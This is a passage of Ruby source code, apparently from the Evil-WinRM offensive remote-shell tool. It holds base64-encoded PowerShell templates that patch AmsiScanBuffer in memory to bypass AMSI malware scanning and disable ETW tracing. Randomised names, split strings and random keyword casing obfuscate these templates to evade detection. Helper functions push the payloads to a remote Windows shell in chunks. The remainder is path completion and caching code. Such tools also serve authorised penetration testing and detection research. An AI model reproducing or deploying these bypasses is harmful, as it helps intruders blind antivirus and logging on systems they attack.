template.index(a_mark) 1677 | last_i = 0 1678 | if !begin_i.nil? && begin_i >= 0 1679 | next_i = template.index(a_mark, begin_i + 1) 1680 | while !next_i.nil? && !begin_i.nil? && next_i > begin_i && next_i + 2 <= template.length 1681 | next_i += 2 1682 | last_i = next_i 1683 | replace_string_scan_part(result, begin_i, next_i, a_mark) 1684 | begin_i = template.index(a_mark, next_i) 1685 | if !begin_i.nil? && begin_i >= 0 1686 | next_i = template.index(a_mark, begin_i + 1) 1687 | else 1688 | next_i = -1 1689 | end 1690 | end 1691 | end 1692 | result 1693 | end 1694 | 1695 | def rand_casing_keywords(template) 1696 | $WORDS_RANDOM_CASE.each { |w| template.gsub!(w.to_s, random_case(w)) } 1697 | template 1698 | end 1699 | 1700 | def get_menu 1701 | menu_template = 'ZnVuY3Rpb24gPj48RlVOQ1RJT04yPj48IHsKICAgIGxzIGZ1bmN0aW9uOiB8IFdoZXJlLU9iamVjdCB7CiAgICAgICAgJF8ubmFtZSAtbm90bWF0Y2ggIl4oP2kpIisiKD4+PEZVTkNUSU9ONT4+PHxDb252ZXJ0RnJvbS1TZGRsU3RyaW5nfEdldC1WZXJifEltcG9ydFN5c3RlbU1vZHVsZXN8aGVscHxjZHxvc3MpIiAtYW5kCiAgICAgICAgKCRfLm5hbWUpLkxlbmd0aCAtZ2UgIjQiCiAgICB9Cn0KCmZ1bmN0aW9uID4+PEZVTkNUSU9OND4+PCB7CiAgICA+PjxGVU5DVElPTjI+PjwgfCBXaGVyZS1PYmplY3QgewogICAgICAgICRfLm5hbWUgLW5vdG1hdGNoICJeKD9pKSIrIihDbGVhci1Ib3N0fEZvcm1hdC1IZXh8R2V0LUZpbGVIYXNofG1rZGlyfFRhYkV4cGFuc2lvbjJ8Pj48RlVOQ1RJT04xPj48KSIKICAgIH0KfQoKZnVuY3Rpb24gPj48RlVOQ1RJT04zPj48IHsKICAgID4+PEZVTkNUSU9OND4+PCB8IFdoZXJlLU9iamVjdCB7IAogICAgICAgICRfLm5hbWUgLW5vdG1hdGNoICJeKD9pKSIrIihtb3JlfE5ldy1HdWlkfE5ldy1UZW1wb3JhcnlGaWxlfD4+PEZVTkNUSU9OMj4+PHw+PjxGVU5DVElPTjM+PjwpIgogICAgfQp9CgpmdW5jdGlvbiA+PjxGVU5DVElPTjU+PjwgewogICAgPj48RlVOQ1RJT04zPj48IHwgV2hlcmUtT2JqZWN0IHsgCiAgICAgICAgJF8ubmFtZSAtbm90bWF0Y2ggIl4oP2kpIisiKD4+PEZVTkNUSU9ONj4+PHxJbXBvcnQtUG93ZXJTaGVsbERhdGFGaWxlfE1haW58UGF1c2V8cHJvbXB0fD4+PEZVTkNUSU9OND4+PCkiCiAgICB9Cn0KCmZ1bmN0aW9uID4+PEZVTkNUSU9ONj4+PCB7CiAgICA+PjxGVU5DVElPTjU+PjwgfCBTZWxlY3QtT2JqZWN0IC1Qcm9wZXJ0eSBOYW1lIHwgRm9yRWFjaC1PYmplY3QgewogICAgICAgICIkKCRfLk5hbWUpIgogICAgfQp9CgpmdW5jdGlvbiA+PjxGVU5DVElPTjE+PjwgewoKICAgICRnbG9iYWw6c2hvd21ldGhvZHMKfQo=' 1702 | result = Base64.decode64(menu_template) 1703 | show_methods_loaded = "Get-#{random_string((5..15).to_a.sample)}" 1704 | menu_function_name = "Get-#{random_string((4..17).to_a.sample)}" 1705 | random_func1 = "Get-#{random_string((7..17).to_a.sample)}" 1706 | random_func2 = "Get-#{random_string((7..17).to_a.sample)}" 1707 | random_func3 = "Get-#{random_string((7..17).to_a.sample)}" 1708 | random_func4 = "Get-#{random_string((7..17).to_a.sample)}" 1709 | result = replace_func_var_name(result, "FUNCTION1", show_methods_loaded) 1710 | result = replace_func_var_name(result, "FUNCTION2", random_func1) 1711 | result = replace_func_var_name(result, "FUNCTION3", random_func2) 1712 | result = replace_func_var_name(result, "FUNCTION4", random_func3) 1713 | result = replace_func_var_name(result, "FUNCTION5", random_func4) 1714 | result = replace_func_var_name(result, "FUNCTION6", menu_function_name) 1715 | result = replace_with_string_scan(result) 1716 | result = rand_casing_keywords(result) 1717 | $SHOW_GLOBAL_METHODS_CMD = show_methods_loaded 1718 | $MENU_CMD = menu_function_name 1719 | result 1720 | end 1721 | 1722 | def get_Bypass_4MSI 1723 | bypass_template = 'ZnVuY3Rpb24gPj48RlVOQ1RJT04xPj48IHsKICAgIFBhcmFtICg+PjxWQVIxPj48LCA+PjxWQVIyPj48KQogICAgPj48VkFSMz4+PCA9IChbQXBwRG9tYWluXTo6Q3VycmVudERvbWFpbi5HZXRBc3NlbWJsaWVzKCkgfAogICAgV2hlcmUtT2JqZWN0IHsgCiAgICAgICAgJF8uR2xvYmFsQXNzZW1ibHlDYWNoZSAtQW5kICRfLkxvY2F0aW9uLlNwbGl0KCIiKzw+PFw8PjwrIiIpWy0xXS5FcXVhbHMoIiIrPD48U3lzdGVtLmRsbDw+PCsiIikKICAgICB9KS5HZXRUeXBlKCJNaWNyb3NvZnQuIis8PjxXaW4zMi5Vbjw+PCsic2FmZU5hdGl2ZU1ldGhvZHMiKQogICAgPj48VkFSND4+PD1AKCkKICAgID4+PFZBUjM+PjwuR2V0TWV0aG9kcygpIHwgRm9yRWFjaC1PYmplY3QgewogICAgICAgIElmKCRfLk5hbWUgLWxpa2UgIkdlKlAqb2MqIis8PjxkZHJlczw+PCsicyIpIHsKICAgICAgICAgICAgPj48VkFSND4+PCs9JF8KICAgICAgICB9CiAgICB9CiAgICByZXR1cm4gPj48VkFSND4+PFswXS5JbnZva2UoJG51bGwsIEAoKD4+PFZBUjM+PjwuR2V0TWV0aG9kKCIiKzw+PEdldE08PjwrIm9kdWwiKzw+PGVIYW48PjwrImRsZSIpKS5JbnZva2UoJG51bGwsIEAoPj48VkFSMT4+PCkpLCA+PjxWQVIyPj48KSkKfQojanVtcAoKZnVuY3Rpb24gPj48RlVOQ1RJT04yPj48IHsKICAgIFBhcmFtICgKICAgICBbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUpXSBbVHlwZVtdXSA+PjxWQVI1Pj48LCBbUGFyYW1ldGVyKFBvc2l0aW9uID0gMSldIFtUeXBlXSA+PjxWQVI2Pj48ID0gW1ZvaWRdCiAgICApCiAgICA+PjxWQVIxMj4+PCA9IFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkRlZmluZUR5bmFtaWNBc3NlbWJseSgKICAgICAgICAoTmV3LU9iamVjdCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseU5hbWUoIiIrPD48UmVmPD48KyJsZWMiKzw+PHRlZERlPD48KyJsZWdhdGUiKSksCiAgICAgICAgW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuCiAgICApLkRlZmluZUR5bmFtaWNNb2R1bGUoCiAgICAgICAgIiIrPD48SW5NPD48KyJlbW8iKzw+PHJ5PD48KyJNb2R1bGUiLAogICAgICAgICRmYWxzZQogICAgKS5EZWZpbmVUeXBlKAogICAgICAgICQoIiIrPD48TXlEZWxlZ2F0ZVR5cGU8PjwrIiIpLAogICAgICAgICJDbGFzcywgUHVibGljLCBTZWFsZWQsIEFuc2lDbGFzcywgQXV0b0NsYXNzIiwKICAgICAgICBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXQogICAgKQoKICAgID4+PFZBUjEyPj48LkRlZmluZUNvbnN0cnVjdG9yKAogICAgICAgICJSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYyIsCiAgICAgICAgW1N5c3RlbS5SZWZsZWN0aW9uLkNhbGxpbmdDb252ZW50aW9uc106OlN0YW5kYXJkLCA+PjxWQVI1Pj48CiAgICApLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsIE1hbmFnZWQiKQoKICAgID4+PFZBUjEyPj48LkRlZmluZU1ldGhvZCgKICAgICAgICAiSW52b2tlIiwKICAgICAgICAiUHVibGljLCBIaWRlQnlTaWcsIE5ld1Nsb3QsIFZpcnR1YWwiLAogICAgICAgID4+PFZBUjY+PjwsCiAgICAgICAgPj48VkFSNT4+PAogICAgKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCJSdW50aW1lLCBNYW5hZ2VkIikKICAgIAogICAgcmV0dXJuID4+PFZBUjEyPj48LkNyZWF0ZVR5cGUoKQp9CiNqdW1wCltJbnRQdHJdPj48VkFSNz4+PCA9ID4+PEZVTkNUSU9OMT4+PCAkKCIiKzw+PGFtc2kuZGxsPD48KyIiKSAkKCIiKzw+PEFtc2lTY2FuQnVmZmVyPD48KyIiKQojanVtcAo+PjxWQVI4Pj48ID0gMAojanVtcAo+PjxWQVI5Pj48PVtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKAogICAgKD4+PEZVTkNUSU9OMT4+PCAkKCIiKzw+PGtlcm5lbDMyLmRsbDw+PCsiIikgVmlydHVhbFByb3RlY3QpLCAKICAgICg+PjxGVU5DVElPTjI+PjwgQChbSW50UHRyXSwgW1VJbnQzMl0sIFtVSW50MzJdLCBbVUludDMyXS5NYWtlQnlSZWZUeXBlKCkpIChbQm9vbF0pKQopCiNqdW1wCj4+PFZBUjEwPj48ID0gPj48VkFSOT4+PC5JbnZva2UoPj48VkFSNz4+PCwgMywgMHg0MCwgW3JlZl0+PjxWQVI4Pj48KQojanVtcAo+PjxWQVIxMT4+PCA9IFtCeXRlW11dICgweGI4LDB4MzQsMHgxMiwweDA3LDB4ODAsMHg2NiwweGI4LDB4MzIsMHgwMCwweGIwLDB4NTcsMHhjMykKI2p1bXAKPj48VkFSMTA+PjwgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KD4+PFZBUjExPj48LCAwLCA+PjxWQVI3Pj48LCAxMikKI2p1bXAKUmVtb3ZlLUl0ZW0gRnVuY3Rpb246Pj48RlVOQ1RJT04yPj48CiNqdW1wClJlbW92ZS1JdGVtIEZ1bmN0aW9uOj4+PEZVTkNUSU9OMT4+PA==' 1724 | 1725 | result = Base64.decode64(bypass_template) 1726 | 1727 | for i in 1..2 1728 | func_name = "Get-#{random_string((7..17).to_a.sample)}" 1729 | result = replace_func_var_name(result, "FUNCTION#{i}", func_name) 1730 | end 1731 | 1732 | for i in 1..12 1733 | var_name = "$#{random_string((7..17).to_a.sample)}" 1734 | result = replace_func_var_name(result, "VAR#{i}", var_name) 1735 | end 1736 | 1737 | result = replace_with_string_scan(result) 1738 | result = rand_casing_keywords(result) 1739 | result 1740 | end 1741 | 1742 | def wait_for(time_to_wait) 1743 | thread = Thread.new do 1744 | sleep(time_to_wait) 1745 | end 1746 | thread.join 1747 | end 1748 | 1749 | def load_powershell(shell, powershell_script, sleep_for = 2) 1750 | outputs = [] 1751 | num_jumps = powershell_script.scan(/#jump/).size + 1 1752 | current_jump = 1 1753 | if num_jumps > 1 1754 | powershell_script.split('#jump').each do |item| 1755 | progress_bar(current_jump, num_jumps) 1756 | output = shell.run(item) 1757 | if !output.output.nil? && !output.output.empty? && !output.output.chomp.empty? 1758 | outputs << output.output 1759 | end 1760 | current_jump += 1 1761 | wait_for(sleep_for) 1762 | end 1763 | else 1764 | output = shell.run(powershell_script).output 1765 | if !output.nil? && !output.empty? 1766 | outputs << output 1767 | end 1768 | end 1769 | outputs 1770 | end 1771 | 1772 | def load_Bypass_4MSI(shell) 1773 | bypass = get_Bypass_4MSI 1774 | print_message('Patching 4MSI, please be patient...', TYPE_INFO, true) 1775 | outputs = load_powershell(shell, bypass, 2) 1776 | if outputs.empty? 1777 | print_message('[+] Success!', TYPE_SUCCESS, false) 1778 | else 1779 | puts(outputs.join("\n")) 1780 | end 1781 | end 1782 | 1783 | def load_ETW_patch(shell) 1784 | print_message('Patching ETW, please be patient ..', TYPE_INFO, true) 1785 | patch_template = 'W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkV2l0aFBhcnRpYWxOYW1lKCIiKzw+PFN5c3RlbS5Db3JlPD48KyIiKS5HZXRUeXBlKCJTeXMiKzw+PHRlbS5EaWFnPD48KyJub3N0aWNzLkUiKzw+PHZlbnRpbmcuRXZlbnQ8PjwrIlByb3ZpZGVyIikuR2V0RmllbGQoIiIrPD48bV88PjwrImVuYWJsZWQiLCJOb25QdWJsaWMsSW5zdGFuY2UiKS5TZXRWYWx1ZShbUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCJTeXMiKzw+PHRlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uVHJhY2luZy5QU0V0dzw+PCsiTG9nIis8PjxQcm92aWRlcjw+PCsiIikuR2V0RmllbGQoIiIrPD48ZXR3UHJvdmlkZXI8PjwrIiIsIk5vblB1YmxpYyxTdGF0aWMiKS5HZXRWYWx1ZSg+PjxWQVIxPj48KSwwKQ==' 1786 | result = Base64.decode64(patch_template) 1787 | result = replace_func_var_name(result, "VAR1", "$#{random_string((7..17).to_a.sample)}") 1788 | result = replace_with_string_scan(result) 1789 | result = rand_casing_keywords(result) 1790 | outputs = load_powershell(shell, result) 1791 | if outputs.empty? 1792 | print_message('[+] Success!', TYPE_SUCCESS, false) 1793 | else 1794 | puts("Error #{outputs.join("\n")}") 1795 | end 1796 | end 1797 | 1798 | def extract_filename(path) 1799 | path = path || "" 1800 | path = path.gsub("\\", '/') 1801 | path.split('/')[-1] 1802 | end 1803 | 1804 | def get_paths_from_command(command, pwd) 1805 | parts = Shellwords.shellsplit(command) 1806 | parts.delete_at(0) 1807 | return parts 1808 | end 1809 | 1810 | def get_from_cache(n_path) 1811 | return if n_path.nil? || n_path.empty? 1812 | 1813 | a_path = normalize_path(n_path) 1814 | current_time = Time.now.to_i 1815 | current_vals = @directories[a_path] 1816 | result = [] 1817 | unless current_vals.nil? 1818 | is_valid = current_vals['time'] > current_time - @cache_ttl 1819 | result = current_vals['files'] if is_valid 1820 | @directories.delete(a_path) unless is_valid 1821 | end 1822 | 1823 | result 1824 | end 1825 | 1826 | def set_cache(n_path, paths) 1827 | return if n_path.nil? || n_path.empty? 1828 | 1829 | a_path = normalize_path(n_path) 1830 | current_time = Time.now.to_i 1831 | @directories[a_path] = { 'time' => current_time, 'files' => paths } 1832 | end 1833 | 1834 | def normalize_path(str) 1835 | Regexp.escape(str.to_s.gsub('\\', '/')) 1836 | end 1837 | 1838 | def get_dir_parts(n_path) 1839 | return [n_path, ''] unless (n_path[-1] =~ %r{/$}).nil? 1840 | 1841 | i_last = n_path.rindex('/') 1842 | return ['./', n_path] if i_last.nil? 1843 | 1844 | next_i = i_last + 1 1845 | amount = n_path.length - next_i 1846 | 1847 | [n_path[0, i_last + 1], n_path[next_i, amount]] 1848 | end 1849 | 1850 | def complete_path(str, shell) 1851 | return unless @completion_enabled 1852 | return unless !str.empty? && !(str =~ %r{^(\./|[a-z,A-Z]:|\.\./|~/|/)*}i).nil? 1853 | 1854 | n_path = str 1855 | parts = get_dir_parts(n_path) 1856 | dir_p = parts[0] 1857 | nam_p = parts[1] 1858 | result = [] 1859 | result = get_from_cache(dir_p) unless dir_p =~ %r{^(\./|\.\./|~|/)} 1860 | 1861 | if result.nil? || result.empty? 1862 | target_dir = dir_p 1863 | pscmd = "$a=@();$(ls '#{target_dir}*' -ErrorAction SilentlyContinue -Force |Foreach-Object { if((Get-Item $_.FullName -ErrorAction SilentlyContinue) -is [System.IO.DirectoryInfo] ){ $a += \"$($_.FullName.Replace('\\','/'))/\"}else{ $a += \"$($_.FullName.Replace('\\', '/'))\" } });$a += \"$($(Resolve-Path -Path '#{target_dir}').Path.Replace('\\','/'))\";$a" 1864 | 1865 | output = shell.run(pscmd).output 1866 | s = output.to_s.gsub(/\r/, '').split(/\n/) 1867 | 1868 | dir_p = s.pop 1869 | set_cache(dir_p, s) 1870 | result = s 1871 | end 1872 | dir_p += '/' unless dir_p[-1] == '/' 1873 | path_grep = normalize_path(dir_p + nam_p) 1874 | path_grep = path_grep.chop if !path_grep.empty? && path_grep[0] == '"' 1875 | filtered = result.grep(/^#{path_grep}/i) 1876 | filtered.collect { |x| "\"#{x}\"" } 1877 | end 1878 | end 1879 | 1880 | # Class to create array (tokenize) from a string 1881 | class String 1882 | def tokenize 1883 | split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/) 1884 | .reject(&:empty?) 1885 | .map { |s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/, '') } 1886 | end 1887 | end 1888 | 1889 | # Execution 1890 | e = EvilWinRM.new 1891 | e.main 1892 | --------------------------------------------------------------------------------